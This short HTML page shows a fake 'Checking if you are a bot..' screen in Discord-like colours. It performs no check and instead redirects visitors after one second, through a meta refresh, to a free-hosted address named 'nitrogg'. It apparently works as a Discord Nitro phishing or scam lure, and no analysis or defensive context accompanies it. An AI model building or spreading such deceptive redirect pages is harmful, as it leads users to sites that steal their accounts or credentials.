

      <!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Cyberz</title>
        <style type="text/css">
            
            * {
                margin: 0;
                padding: 0;
            }
            body {
                background-color: #7289DA;
            }
            h1 {
                position: absolute;
                left: 50%;
                top: 50%;
                transform: translateX(-50%) translateY(-50%);
                text-align: center;
                font-family: ariel;
                font-size: 3em;
                color: #ffffff;
            }
            
        </style>
    </head>
    <body>

        <h1>Checking if you are a bot..</h1>
        
        
        
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
        <script type="text/javascript"></script>

    </body>
</html>

<head>
  <meta http-equiv="refresh" content="1; URL=https://nitrogg.000webhostapp.com/" />
</head>
